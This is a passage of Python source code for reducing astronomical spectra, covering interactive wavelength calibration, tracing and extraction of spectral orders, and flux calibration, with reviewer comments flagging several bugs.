xlim=self.ax[1].get_xlim()
self.ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5)
self.ax[1].plot(xlim,[0,0],linestyle=':')
self.ax[1].text(0.1,0.9,'rms: {:8.3f}'.format(diff[gd].std()),transform=self.ax[1].transAxes)
cb_ax = self.fig.add_axes([0.94,0.05,0.02,0.4])
cb = self.fig.colorbar(scat,cax=cb_ax)
cb.ax.set_ylabel('Row')
plt.draw()
self.fig.canvas.draw_idle()
input(' See 2D wavecal fit. Hit any key to continue....')
else :
self.model=fitter(mod,self.pix-self.pix0,self.waves*self.waves_order,weights=self.weights)
diff=self.waves-self.wave(pixels=[self.pix])
print(' rms: {:8.3f} Angstroms'.format(diff.std()))
if self.ax is not None :
# iterate allowing for interactive removal of points
done = False
ymax = self.ax[0].get_ylim()[1]
while not done :
# do fit
gd=np.where(self.weights>0.)[0]
bd=np.where(self.weights<=0.)[0]
self.model=fitter(mod,self.pix[gd]-self.pix0,self.waves[gd]*self.waves_order[gd],weights=self.weights[gd])
diff=self.waves-self.wave(pixels=[self.pix])
print(' rms: {:8.3f} Anstroms'.format(diff[gd].std()))
# replot spectrum with new fit wavelength scale
self.ax[0].cla()
self.ax[0].plot(self.wave(image=self.spectrum.data.shape)[0,:],self.spectrum.data[0,:])
# plot residuals
self.ax[1].cla()
self.ax[1].plot(self.waves[gd],diff[gd],'go')
self.ax[1].text(0.1,0.9,'rms: {:8.3f} Angstroms'.format(diff[gd].std()),transform=self.ax[1].transAxes)
self.ax[1].set_xlabel('Wavelength')
self.ax[1].set_ylabel('obs wave - fit wave')
if len(bd) > 0 : self.ax[1].plot(self.waves[bd],diff[bd],'ro')
self.ax[1].set_ylim(diff[gd].min()-0.5,diff[gd].max()+0.5)
for i in range(len(self.pix)) :
self.ax[1].text(self.waves[i],diff[i],'{:2d}'.format(i),va='top',ha='center')
if self.weights[i] > 0 :
self.ax[0].plot([self.waves[i],self.waves[i]],[0,ymax],'g')
else :
self.ax[0].plot([self.waves[i],self.waves[i]],[0,ymax],'r')
plt.draw()
# get input from user on lines to remove
for i in range(len(self.pix)) :
print('{:3d}{:8.2f}{:8.2f}{:8.2f}{:8.2f}'.format(
i, self.pix[i], self.waves[i], diff[i], self.weights[i]))
i = input(' enter ID of line to remove (-n for all lines<n, +n for all lines>n, O for new degree, return to continue): ')
if i == '' :
done = True
elif i == 'O' :
print(' current degree of fit: {:d}'.format(self.degree))
self.degree = int(input(' enter new degree of fit: '))
mod = self.getmod()
elif '+' in i :
self.weights[int(i)+1:] = 0.
elif '-' in i :
self.weights[0:abs(int(i))] = 0.
elif int(i) >= 0 :
self.weights[int(i)] = 0.
else :
print('invalid input')
def set_spectrum(self,spectrum) :
""" Set spectrum used to derive fit
"""
self.spectrum = np.atleast_2d(spectrum)
    def get_spectrum(self) :
        """ Return the spectrum used to derive the fit
        """
        return self.spectrum
    def identify(self,spectrum,file=None,wav=None,wref=None,disp=None,display=None,plot=None,rad=5,thresh=10,
                 xmin=None, xmax=None, lags=range(-300,300), nskip=1) :
        """ Given some estimate of wavelength solution and file with lines,
            identify peaks and centroid

            spectrum : object with .data and .uncertainty arrays (rows of spectra)
            file : lamp line list in data/lamps/ (wavelengths in first column)
            wav : initial per-pixel wavelength guess; if None it is derived
                  from self.spectrum via cross-correlation, or linearly from
                  disp/wref
            wref : (wavelength, pixel) reference pair for the linear guess
            disp : dispersion for the linear guess
            display : pyvista TV object for image display
            plot : matplotlib Figure for interactive plots
            rad : centroiding window half-width (pixels)
            thresh : S/N threshold for accepting a line
            xmin, xmax : pixel range to search
            lags : lags to try in the cross-correlation
            nskip : row increment

            Results are stored in self.pix, self.y, self.waves,
            self.waves_order, self.weights and self.spectrum.
        """
        sz=spectrum.shape
        if len(sz) == 1 :
            # promote a 1D spectrum to a single-row 2D array
            spectrum.data = np.atleast_2d(spectrum.data)
            spectrum.uncertainty.array = np.atleast_2d(spectrum.uncertainty.array)
            sz=spectrum.shape
        if xmin is None : xmin=0
        if xmax is None : xmax=sz[-1]
        nrow=sz[0]
        # get initial reference wavelengths if not given
        if wav is None :
            pix=np.arange(sz[-1])
            if self.spectrum is not None :
                # cross correlate with reference image to get pixel shift
                print(' cross correlating with reference spectrum using lags: ', lags)
                fitpeak,shift = image.xcorr(self.spectrum.data,spectrum.data,lags)
                if shift.ndim == 1 :
                    # one cross-correlation shift for all rows
                    pixshift=(fitpeak+lags[0])[0]
                    print(' Derived pixel shift from input wcal: ',fitpeak+lags[0])
                    if display is not None :
                        display.plotax1.cla()
                        display.plotax1.text(0.05,0.95,'spectrum and reference',transform=display.plotax1.transAxes)
                        for row in range(spectrum.data.shape[0]) :
                            display.plotax1.plot(spectrum.data[row,:],color='m')
                            display.plotax1.plot(self.spectrum.data[row,:],color='g')
                        display.plotax1.set_xlabel('Pixel')
                        display.plotax2.cla()
                        display.plotax2.text(0.05,0.95,'cross correlation: {:8.3f}'.format(pixshift),
                                             transform=display.plotax2.transAxes)
                        display.plotax2.plot(lags,shift)
                        display.plotax1.set_xlabel('Lag')
                        plt.draw()
                        input(" See spectrum and template spectrum (top), cross corrleation(bottom). hit any key to continue")
                    # single shift for all pixels
                    self.pix0 = self.pix0+fitpeak+lags[0]
                    wav=np.atleast_2d(self.wave(image=np.array(sz)))
                else :
                    # different shift for each row
                    wav=np.zeros(sz)
                    cols = np.arange(sz[-1])
                    orders=[]
                    for row in range(wav.shape[0]) :
                        print(' Derived pixel shift from input wcal for row: {:d} {:d}'.format
                              (row,shift[row,:].argmax()+lags[0]),end='\r')
                        rows=np.zeros(len(cols))+row
                        try : order = self.orders[row]
                        except : order=self.orders[0]
                        orders.append(order)
                        pix0 = self.pix0+fitpeak[row]+lags[0]
                        wav[row,:] = self.model(cols-pix0)/order
                    # ensure we have 2D fit
                    self.type = 'chebyshev2D'
                    self.orders = orders
                    print("")
            else :
                # no reference spectrum: build a linear wavelength guess
                # get dispersion guess from header cards if not given in disp
                # NOTE(review): "hd" is not defined anywhere in this scope --
                # this branch raises NameError unless both disp and wref are
                # supplied; confirm the intended source of the header
                if disp is None: disp=hd.header['DISPDW']
                if wref is not None :
                    w0=wref[0]
                    pix0=wref[1]
                else:
                    w0=hd.header['DISPWC']
                    pix0=sz[1]/2
                wav=np.atleast_2d(w0+(pix-pix0)*disp)
        # open file with wavelengths and read
        if file is not None :
            f=open(ROOT+'/data/lamps/'+file,'r')
            lines=[]
            for line in f :
                if line[0] != '#' :
                    w=float(line.split()[0])
                    # if we have microns, convert to Angstroms
                    if w<10 : w*=10000
                    # keep only lines inside the wavelength coverage
                    if w > wav.min() and w < wav.max() : lines.append(w)
            lines=np.array(lines)
            f.close()
        else :
            # reuse previously identified lines that still have weight
            lines = self.waves
            weights = self.weights
            gd = np.where(weights >0)[0]
            lines = lines[gd]
        # get centroid around expected lines
        x=[]
        y=[]
        waves=[]
        waves_order=[]
        weight=[]
        diff=[]
        if display is not None and isinstance(display,pyvista.tv.TV) :
            display.ax.cla()
            display.ax.axis('off')
            display.tv(spectrum.data)
        if plot is not None :
            # reuse a supplied Figure, otherwise create a new one
            if type(plot) is matplotlib.figure.Figure :
                plot.clf()
                plt.draw()
                ax1=plot.add_subplot(2,1,1)
                ax2=plot.add_subplot(2,1,2,sharex=ax1)
                plot.subplots_adjust(left=0.05,right=0.92, hspace=1.05)
                ax=[ax1,ax2]
                self.fig = plot
                self.ax = ax
            else :
                fig,ax = plt.subplots(2,1,sharex=True,figsize=(14,7))
                fig.subplots_adjust(hspace=1.05)
                self.fig = fig
                self.ax = ax
        if plot is not None : ax[0].cla()
        for row in range(0,nrow,nskip) :
            print(' identifying lines in row: ', row,end='\r')
            if plot is not None :
                ax[0].plot(wav[row,:],spectrum.data[row,:])
                #ax[0].set_yscale('log')
                ax[0].set_ylim(1.,ax[0].get_ylim()[1])
                ax[0].text(0.1,0.9,'row: {:d}'.format(row),transform=ax[0].transAxes)
                ax[0].set_xlabel('Rough wavelength')
                ax[0].set_ylabel('Intensity')
            for line in lines :
                # nearest pixel to the expected line position
                peak=abs(line-wav[row,:]).argmin()
                if isinstance(display,pyvista.tv.TV) :
                    if (peak > xmin+rad) and (peak < xmax-rad) : display.ax.scatter(peak,row,marker='o',color='r',s=2)
                # accept the line if it is inside the search window and the
                # local S/N exceeds thresh
                if ( (peak > xmin+rad) and (peak < xmax-rad) and
                     ((spectrum.data[row,peak-rad:peak+rad]/spectrum.uncertainty.array[row,peak-rad:peak+rad]).max() > thresh) ) :
                    # two-pass flux-weighted centroid around the peak
                    cent = (spectrum.data[row,peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spectrum.data[row,peak-rad:peak+rad].sum()
                    peak = int(cent)
                    cent = (spectrum.data[row,peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spectrum.data[row,peak-rad:peak+rad].sum()
                    if display is not None and isinstance(display,pyvista.tv.TV) :
                        display.ax.scatter(cent,row,marker='o',color='g',s=2)
                    if plot is not None :
                        ax[0].text(line,1.,'{:7.1f}'.format(line),rotation='vertical',va='top',ha='center')
                    x.append(cent)
                    y.append(row)
                    # we will fit for wavelength*order
                    waves.append(line)
                    try: order = self.orders[row]
                    except: order=self.orders[0]
                    waves_order.append(order)
                    weight.append(1.)
        if plot is not None :
            if self.model is not None :
                # if we have a solution already, see how good it is (after shift)
                diff=self.wave(pixels=[x,y])-np.array(waves)
                ax[1].cla()
                ax[1].scatter(np.array(waves),diff,s=2,c=y)
                ax[1].text(0.1,0.9,'from previous fit, rms: {:8.3f}'.format(diff.std()),transform=ax[1].transAxes)
                xlim=ax[1].get_xlim()
                ax[1].plot(xlim,[0,0],linestyle=':')
                ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5)
                print(" rms from old fit (with shift): {:8.3f}".format(diff.std()))
            plt.figure(plot.number)
            plt.draw()
            input(' See identified lines. hit any key to continue....')
        # store the identified line set for fit()
        self.pix=np.array(x)
        self.y=np.array(y)
        self.waves=np.array(waves)
        self.waves_order=np.array(waves_order)
        self.weights=np.array(weight)
        self.spectrum = spectrum
        print('')
    def scomb(self,hd,wav,average=True,usemask=True) :
        """ Resample onto input wavelength grid

            Resamples each row of the input image onto the wavelength grid
            `wav` using this object's wavelength solution and combines the
            rows, either as an inverse-variance-weighted average
            (average=True) or a straight sum.

            Parameters
            ----------
            hd : CCDData-like with data, uncertainty, mask, header
            wav : 1D array, output wavelength grid
            average : if True, inverse-variance weighted average of rows;
                      otherwise sum rows
            usemask : if True, drop masked pixels before interpolating

            Returns
            -------
            CCDData with the combined spectrum
        """
        #output grid
        out=np.zeros(len(wav))
        sig=np.zeros(len(wav))
        # NOTE(review): mask is allocated but never updated below, so the
        # returned mask is always all-False -- confirm this is intended
        mask=np.zeros(len(wav),dtype=bool)
        # raw wavelengths
        w=self.wave(image=np.array(np.atleast_2d(hd.data).shape))
        for i in range(np.atleast_2d(hd).shape[0]) :
            # interpolation requires monotonically increasing wavelengths
            sort=np.argsort(w[i,:])
            if usemask :
                gd = np.where(~hd.mask[i,sort])
                sort= sort[gd]
            wmin=w[i,sort].min()
            wmax=w[i,sort].max()
            # indices of the output grid covered by this row
            w2=np.abs(wav-wmin).argmin()
            w1=np.abs(wav-wmax).argmin()
            if average :
                # accumulate flux/variance and summed weights for the
                # inverse-variance weighted mean
                out[w2:w1] += ( np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.data)[i,sort]) /
                                np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array)[i,sort])**2 )
                sig[w2:w1] += 1./np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array)[i,sort])**2
            else :
                # straight sum of flux; variances add
                out[w2:w1] += np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.data)[i,sort])
                sig[w2:w1] += np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array**2)[i,sort])
        if average :
            # normalize by summed weights; sig holds 1/variance here
            out = out / sig
        else :
            sig = np.sqrt(sig)
        return CCDData(out,uncertainty=StdDevUncertainty(sig),mask=mask,header=hd.header,unit='adu')
def save(self,file) :
""" Save object to file
"""
try : delattr(self,'fig')
except: pass
try : delattr(self,'ax')
except: pass
f=open(file,'wb')
pickle.dump(self,f)
f.close()
class Trace() :
    """ Class for spectral traces

        Holds one fitted 1D model per traced aperture, plus bookkeeping:
        the reference column (sc0), the cross-section spectrum at that
        column, the extraction radius (rad), row windows (rows) and
        cross-correlation lags (lags) used to locate shifted traces.
    """
    def __init__ (self,inst=None, type='poly',order=2,pix0=0,rad=5,spectrum=None,model=None,sc0=None,rows=None,lags=None,channel=None) :
        # Generic defaults first; instrument presets below may override.
        self.type = type
        self.order = order
        self.pix0 = pix0
        self.spectrum = spectrum
        self.rad = rad
        if inst == 'TSPEC' :
            # TSPEC: five cross-dispersed orders, each with its own row window
            self.order = 3
            self.rows = [[135,235],[295,395],[435,535],[560,660],[735,830]]
            self.lags = range(-75,75)
        elif inst == 'DIS' :
            # DIS: two channels with different useful row windows
            if channel == 0 : self.rows=[[215,915]]
            elif channel == 1 : self.rows=[[100,800]]
            else : raise ValueError('need to specify channel')
            self.lags = range(-300,300)
        elif inst == 'ARCES' :
            self.lags = range(-10,10)
        # Explicit keyword arguments always win over instrument presets.
        if rows is not None : self.rows=rows
        if lags is not None : self.lags=lags
        if model is not None : self.model=model
        if sc0 is not None : self.sc0=sc0
    def trace(self,hd,srows,sc0=None,plot=None,thresh=20) :
        """ Trace a spectrum from starting position

            hd : image (CCDData-like) to trace
            srows : starting row (or list of rows) at the reference column
            sc0 : reference column (default: middle column of the image)
            plot : optional display object for interactive inspection
            thresh : S/N threshold for accepting a centroid along the trace
        """
        fitter=fitting.LinearLSQFitter()
        if self.type == 'poly' :
            mod=models.Polynomial1D(degree=self.order)
        else :
            raise ValueError('unknown fitting type: '+self.type)
            # NOTE(review): unreachable -- the raise above always fires first
            return
        nrow = hd.data.shape[0]
        ncol = hd.data.shape[1]
        if sc0 is None : self.sc0 = int(ncol/2)
        else : self.sc0 = sc0
        # keep the cross-section at the reference column for later xcorr in find()
        self.spectrum = hd[:,self.sc0]
        self.spectrum.data[self.spectrum.data<0] = 0.
        rows = np.arange(nrow)
        ypos = np.zeros(ncol)
        ysum = np.zeros(ncol)
        yvar = np.zeros(ncol)
        ymask = np.zeros(ncol,dtype=bool)
        # we want to handle multiple traces, so make sure srows is iterable
        if type(srows ) is int or type(srows) is float : srows=[srows]
        # NOTE(review): assumes self.model already exists (set in __init__
        # only when passed, or by a previous trace) -- confirm callers
        oldmodel=copy.copy(self.model)
        self.model=[]
        if plot is not None :
            plot.clear()
            plot.tv(hd)
        rad = self.rad-1
        for irow,srow in enumerate(srows) :
            print('  Tracing row: {:d}'.format(int(srow)),end='\r')
            sr=copy.copy(srow)
            sr=int(round(sr))
            # refine the starting row to the local peak at the reference column
            sr=hd.data[sr-rad:sr+rad+1,self.sc0].argmax()+sr-rad
            # march left from center
            for col in range(self.sc0,0,-1) :
                # centroid
                cr=sr-rad+hd.data[sr-rad:sr+rad+1,col].argmax()
                ysum[col] = np.sum(hd.data[cr-rad:cr+rad+1,col])
                ypos[col] = np.sum(rows[cr-rad:cr+rad+1]*hd.data[cr-rad:cr+rad+1,col]) / ysum[col]
                yvar[col] = np.sum(hd.uncertainty.array[cr-rad:cr+rad+1,col]**2)
                ymask[col] = np.any(hd.mask[cr-rad:cr+rad+1,col])
                # if centroid is too far from starting guess, mask as bad
                if np.abs(ypos[col]-sr) > rad/2. : ymask[col] = True
                # use this position as starting center for next if above threshold S/N
                if (not ymask[col]) & np.isfinite(ysum[col]) & (ysum[col]/np.sqrt(yvar[col]) > thresh) : sr=int(round(ypos[col]))
            # reset to the starting row before marching the other direction
            sr=copy.copy(srow)
            sr=int(round(sr))
            sr=hd.data[sr-rad:sr+rad+1,self.sc0].argmax()+sr-rad
            # march right from center
            for col in range(self.sc0+1,ncol,1) :
                # centroid
                cr=sr-rad+hd.data[sr-rad:sr+rad+1,col].argmax()
                ysum[col] = np.sum(hd.data[cr-rad:cr+rad+1,col])
                ypos[col] = np.sum(rows[cr-rad:cr+rad+1]*hd.data[cr-rad:cr+rad+1,col]) / ysum[col]
                yvar[col] = np.sum(hd.uncertainty.array[cr-rad:cr+rad+1,col]**2)
                ymask[col] = np.any(hd.mask[cr-rad:cr+rad+1,col])
                if np.abs(ypos[col]-sr) > rad/2. : ymask[col] = True
                # use this position as starting center for next if above threshold S/N
                if (not ymask[col]) & np.isfinite(ysum[col]) & (ysum[col]/np.sqrt(yvar[col]) > thresh) : sr=int(round(ypos[col]))
            cols=np.arange(ncol)
            # fit positions that are unmasked and above the S/N threshold
            gd = np.where((~ymask) & (ysum/np.sqrt(yvar)>thresh) )[0]
            model=(fitter(mod,cols[gd],ypos[gd]))
            # reject outlier points (>1 pixel) and refit
            res = model(cols)-ypos
            gd = np.where((~ymask) & (ysum/np.sqrt(yvar)>thresh) & (np.abs(res)<1))[0]
            model=(fitter(mod,cols[gd],ypos[gd]))
            if len(gd) < 10 :
                # too few good points: fall back to the previous model
                print('  failed trace for row: {:d}, using old model'.format(irow))
                model=copy.copy(oldmodel[irow])
            self.model.append(model)
            if plot :
                plot.ax.scatter(cols,ypos,marker='o',color='r',s=4)
                plot.ax.scatter(cols[gd],ypos[gd],marker='o',color='g',s=4)
                plot.ax.plot(cols,model(cols),color='m')
                #plt.pause(0.05)
        self.pix0=0
        print("")
        if plot : input('  See trace. Hit any key to continue....')
    def retrace(self,hd,plot=None,thresh=20) :
        """ Retrace starting with existing model

            Shifts the stored traces onto the new frame via find(), then
            re-runs trace() starting from each model's position at sc0.
        """
        self.find(hd)
        srows = []
        for row in range(len(self.model)) :
            srows.append(self.model[row](self.sc0))
        self.trace(hd,srows,plot=plot,thresh=thresh)
    def find(self,hd,lags=None,plot=None) :
        """ Determine shift from existing trace to input frame

            Cross-correlates the reference-column cross-section of `hd`
            against the stored spectrum; stores and returns the shift.
        """
        if lags is None : lags = self.lags
        im=copy.deepcopy(hd.data)
        # if we have a window, zero array outside of window
        spec=im[:,self.sc0]
        try:
            # NOTE(review): indexing with self.rows[0]/self.rows[1] only
            # works when rows is a flat [lo,hi] pair; with the list-of-
            # windows form set in __init__ this raises and is skipped
            spec[:self.rows[0]] = 0.
            spec[self.rows[1]:] = 0.
        except: pass
        fitpeak,shift = image.xcorr(self.spectrum,spec,lags)
        pixshift=(fitpeak+lags[0])[0]
        print('  traces shift: ', fitpeak+lags[0])
        if plot is not None :
            plot.clear()
            plot.tv(im)
            plot.plotax1.cla()
            plot.plotax1.text(0.05,0.95,'obj and ref cross-section',transform=plot.plotax1.transAxes)
            plot.plotax1.plot(self.spectrum.data/self.spectrum.data.max())
            plot.plotax1.plot(im[:,self.sc0]/im[:,self.sc0].max())
            plot.plotax1.set_xlabel('row')
            plot.plotax2.cla()
            plot.plotax2.text(0.05,0.95,'cross correlation {:8.3f}'.format(pixshift),
                 transform=plot.plotax2.transAxes)
            plot.plotax2.plot(lags,shift)
            plot.plotax2.set_xlabel('lag')
            plt.draw()
            input('  See spectra and cross-correlation. Hit any key to continue....')
        self.pix0=fitpeak+lags[0]
        return fitpeak+lags[0]
    def extract(self,hd,rad=None,scat=False,plot=None,medfilt=None) :
        """ Extract spectrum given trace(s)

            Sums a window of half-width `rad` around each trace, with
            fractional-pixel weighting at the window edges; optionally
            normalizes by a boxcar-smoothed version (medfilt).

            Returns a CCDData with one row per trace.
        """
        if rad is None : rad=self.rad
        nrows=hd.data.shape[0]
        ncols=hd.data.shape[-1]
        spec = np.zeros([len(self.model),hd.data.shape[1]])
        sig = np.zeros([len(self.model),hd.data.shape[1]])
        mask = np.zeros([len(self.model),hd.data.shape[1]],dtype=bool)
        if plot is not None:
            plot.clear()
            plot.tv(hd)
        for i,model in enumerate(self.model) :
            print('  extracting aperture {:d}'.format(i),end='\r')
            # trace center per column, shifted by any offset found by find()
            cr=model(np.arange(ncols))+self.pix0
            icr=np.round(cr).astype(int)
            rfrac=cr-icr+0.5    # add 0.5 because we rounded
            rlo=[]
            rhi=[]
            for col in range(ncols) :
                r1=icr[col]-rad
                r2=icr[col]+rad
                # sum inner pixels directly, outer pixels depending on fractional pixel location of trace
                if r1>=0 and r2<nrows :
                    spec[i,col]=np.sum(hd.data[r1+1:r2,col])
                    sig[i,col]=np.sum(hd.uncertainty.array[r1+1:r2,col]**2)
                    spec[i,col]+=hd.data[r1,col]*(1-rfrac[col])
                    sig[i,col]+=hd.uncertainty.array[r1,col]**2*(1-rfrac[col])
                    spec[i,col]+=hd.data[r2,col]*rfrac[col]
                    sig[i,col]+=hd.uncertainty.array[r2,col]**2*rfrac[col]
                    sig[i,col]=np.sqrt(sig[i,col])
                    mask[i,col] = np.any(hd.mask[r1:r2+1,col])
                if plot is not None :
                    rlo.append(r1)
                    rhi.append(r2-1)
            if medfilt is not None :
                # normalize by a smoothed copy (e.g. for flat-field spectra)
                boxcar = Box1DKernel(medfilt)
                median = convolve(spec[i,:],boxcar,boundary='extend')
                spec[i,:]/=median
                sig[i,:]/=median
            if plot is not None :
                # alternate window colors between apertures for readability
                if i%2 == 0 : color='b'
                else : color='m'
                plot.ax.plot(range(ncols),cr,color='g',linewidth=3)
                plot.ax.plot(range(ncols),rlo,color=color,linewidth=1)
                plot.ax.plot(range(ncols),rhi,color=color,linewidth=1)
                plt.draw()
        if plot is not None : input('  See extraction window(s). Hit any key to continue....')
        print("")
        return CCDData(spec,uncertainty=StdDevUncertainty(sig),mask=mask,header=hd.header,unit='adu')
    def extract2d(self,hd,rows=None,plot=None) :
        """ Extract 2D spectrum given trace(s)
            Assumes all requests row uses same trace, just offset, not a 2D model for traces

            For each trace, shifts every column by the trace's curvature
            (relative to the reference column) so the trace is straight,
            and returns the rectified window self.rows[0]:self.rows[1].
        """
        nrows=hd.data.shape[0]
        ncols=hd.data.shape[-1]
        out=[]
        if plot is not None:
            plot.clear()
            plot.tv(hd)
        for model in self.model :
            if plot is not None :
                plot.ax.plot([0,ncols],[self.rows[0],self.rows[0]],color='g')
                plot.ax.plot([0,ncols],[self.rows[1],self.rows[1]],color='g')
                plt.draw()
            # NOTE(review): as in find(), this uses rows as a flat [lo,hi]
            # pair -- confirm against how rows was configured
            outrows=np.arange(self.rows[0],self.rows[1])
            noutrows=len(range(self.rows[0],self.rows[1]))
            spec=np.zeros([noutrows,ncols])
            sig=np.zeros([noutrows,ncols])
            cr=model(np.arange(ncols))
            # curvature relative to the reference column
            cr-=cr[self.sc0]
            for col in range(ncols) :
                spec[:,col] = np.interp(outrows+cr[col],np.arange(nrows),hd.data[:,col])
                sig[:,col] = np.sqrt(np.interp(outrows+cr[col],np.arange(nrows),hd.uncertainty.array[:,col]**2))
            out.append(CCDData(spec,StdDevUncertainty(sig),unit='adu'))
        if plot is not None: input('  enter something to continue....')
        if len(out) == 1 : return out[0]
        else : return out
    def save(self,file) :
        """ Save object to file

            Strips the unpicklable matplotlib axes handle first.
        """
        try : delattr(self,'ax')
        except: pass
        f=open(file,'wb')
        pickle.dump(self,f)
        f.close()
def mash(hd,sp=None,bks=None) :
    """
    Mash image into spectra using requested window

    Parameters
    ----------
    hd : object with a 2D `data` array (e.g. CCDData)
    sp : [r1,r2] row window to sum over, or None for the full image
    bks : optional list of [r1,r2] background windows; the mean of their
          row-medians is subtracted from the summed spectrum

    Returns
    -------
    1D array : summed (and background-subtracted) spectrum
    """
    if sp is None :
        sp=[0,hd.data.shape[0]]
    # collapse the requested rows into a single spectrum
    # (a duplicated identical sum was removed here)
    obj = hd.data[sp[0]:sp[1]].sum(axis=0)
    if bks is not None :
        back=[]
        for bk in bks :
            # bug fix: previously referenced undefined name `data`
            tmp=np.median(hd.data[bk[0]:bk[1]],axis=0)
            back.append(tmp)
        obj-= np.mean(back,axis=0)
    return obj
def wavecal(hd,file=None,wref=None,disp=None,wid=[3],rad=5,snr=3,degree=2,wcal0=None,thresh=100,type='poly'):
    """
    Get wavelength solution for single 1D spectrum

    Interactively identifies lamp lines from `file` in the central rows of
    `hd`, centroids them, fits a wavelength solution of the given polynomial
    degree, and lets the user reject points until satisfied.

    Parameters
    ----------
    hd : CCDData-like 2D arc-lamp image
    file : path to a text file of laboratory line wavelengths
    wref : optional (wavelength, pixel) reference pair for the initial guess
    disp : dispersion guess (Angstroms/pixel); defaults to header DISPDW
    rad : centroiding half-width in pixels
    degree : polynomial degree of the fit
    wcal0 : optional existing WaveCal used (with a pixel shift) as the guess
    thresh : minimum peak counts to accept a line
    type : fitting-function type passed to WaveCal

    Returns
    -------
    (wavelength array for each pixel, fitted WaveCal object)
    """
    # choose middle row +/- 5 rows and remove a smooth background
    sz=hd.data.shape
    spec=hd.data[int(sz[0]/2)-5:int(sz[0]/2)+5,:].sum(axis=0)
    spec=spec-scipy.signal.medfilt(spec,kernel_size=101)
    pix = np.arange(len(spec))
    fig,ax = plt.subplots(2,1,sharex=True,figsize=(14,6))
    ax[0].plot(spec)
    # get wavelength guess from input WaveCal if given, else use wref and dispersion, else header
    if wcal0 is not None :
        lags=range(-300,300)
        fitpeak,shift = image.xcorr(wcal0.spectrum,spec,lags)
        wnew=copy.deepcopy(wcal0)
        wnew.pix0 = wcal0.pix0+shift.argmax()+lags[0]
        print('  Derived pixel shift from input wcal0: ',shift.argmax()+lags[0])
        wav=wnew.wave(pix)
    else :
        # get dispersion guess from header cards if not given in disp
        if disp is None: disp=hd.header['DISPDW']
        if wref is not None :
            w0=wref[0]
            pix0=wref[1]
            wav=w0+(pix-pix0)*disp
        else:
            w0=hd.header['DISPWC']
            pix0=sz[1]/2
            wav=w0+(pix-pix0)*disp
    ax[1].plot(wav,spec)
    # open file with laboratory wavelengths; keep lines that land on the detector
    f=open(file,'r')
    lines=[]
    for line in f :
        if line[0] != '#' :
            w=float(line.split()[0])
            lpix=abs(w-wav).argmin()
            if lpix > 1 and lpix < sz[1]-1 :
                ax[0].text(lpix,0.,'{:7.1f}'.format(w),rotation='vertical',va='top',ha='center')
                lines.append(w)
    lines=np.array(lines)
    f.close()
    # get centroid around expected lines
    cents=[]
    for line in lines :
        peak=abs(line-wav).argmin()
        if (peak > rad) and (peak < sz[1]-rad) and (spec[peak-rad:peak+rad].max() > thresh) :
            print(peak,spec[peak-rad:peak+rad].max())
            cents.append((spec[peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spec[peak-rad:peak+rad].sum())
    cents=np.array(cents)
    print('  cents:', cents)
    waves=[]
    weight=[]
    print('  Centroid   W0   Wave')
    for cent in cents :
        # associate each measured centroid with the nearest catalog line
        w=wav[int(cent)]
        ax[0].plot([cent,cent],[0,10000],'k')
        print('  {:8.2f}{:8.2f}{:8.2f}'.format(cent, w, lines[np.abs(w-lines).argmin()]))
        waves.append(lines[np.abs(w-lines).argmin()])
        weight.append(1.)
    waves=np.array(waves)
    weight=np.array(weight)
    # set up new WaveCal object
    pix0 = int(sz[1]/2)
    wcal = WaveCal(order=degree,type=type,spectrum=spec,pix0=pix0)
    # iterate allowing for interactive removal of points
    done = False
    ymax = ax[0].get_ylim()[1]
    while not done :
        gd=np.where(weight>0.)[0]
        bd=np.where(weight<=0.)[0]
        wcal.fit(cents[gd],waves[gd],weights=weight[gd])
        # plot residuals of the current fit (good green, rejected red)
        ax[1].cla()
        ax[1].plot(cents[gd],wcal.wave(cents[gd])-waves[gd],'go')
        if len(bd) > 0 : ax[1].plot(cents[bd],wcal.wave(cents[bd])-waves[bd],'ro')
        diff=wcal.wave(cents[gd])-waves[gd]
        ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5) if False else ax[1].set_ylim(diff.min()-1,diff.max()+1)
        for i in range(len(cents)) :
            ax[1].text(cents[i],wcal.wave(cents[i])-waves[i],'{:2d}'.format(i),va='top',ha='center')
            if weight[i] > 0 :
                ax[0].plot([cents[i],cents[i]],[0,ymax],'g')
            else :
                ax[0].plot([cents[i],cents[i]],[0,ymax],'r')
        plt.draw()
        # get input from user on lines to remove
        for i in range(len(cents)) :
            print('  {:3d}{:8.2f}{:8.2f}{:8.2f}{:8.2f}{:8.2f}'.format(
                  i, cents[i], wcal.wave(cents[i]), waves[i], waves[i]-wcal.wave(cents[i]),weight[i]))
        print('  rms: {:8.2f} Anstroms'.format(diff.std()))
        i = input('enter ID of line to remove (-n for all lines<n, +n for all lines>n, return to continue): ')
        # bug fix: was `i is ''` -- an identity check that is not guaranteed
        # to hold for equal strings (SyntaxWarning on Python >= 3.8)
        if i == '' :
            done = True
        elif '+' in i :
            weight[int(i)+1:] = 0.
        elif '-' in i :
            weight[0:abs(int(i))] = 0.
        elif int(i) >= 0 :
            weight[int(i)] = 0.
        else :
            print('invalid input')
    plt.close()
    return wcal.wave(pix),wcal
def fluxcal(obs,wobs,file=None) :
    """
    Flux calibration: derive the response curve from a standard star.

    Reads the tabulated standard-star fluxes from `file` (columns col1 =
    wavelength, col2 = flux), interpolates them onto the observed
    wavelengths `wobs`, and returns standard/observed.
    """
    standard_table = ascii.read(file)
    standard_flux = np.interp(wobs, standard_table['col1'], standard_table['col2'])
    return standard_flux / obs
def trace(hd,apertures=None,pix0=1024) :
    """ Get all traces

        Parameters
        ----------
        hd : image (CCDData-like) to trace
        apertures : list of starting row numbers at column `pix0`
                    (None is treated as no apertures)
        pix0 : reference column at which the aperture rows are given

        Returns
        -------
        list of Trace objects, one per aperture
    """
    alltr=[]
    # bug fix: len(None) used to raise for the default argument
    if apertures is None :
        return alltr
    for i in range(len(apertures)) :
        tr=Trace()
        print('tracing aperture {:d}'.format(i),end='\r')
        sr=apertures[i]
        # bug fix: arguments were swapped -- Trace.trace(hd, srows, sc0=...)
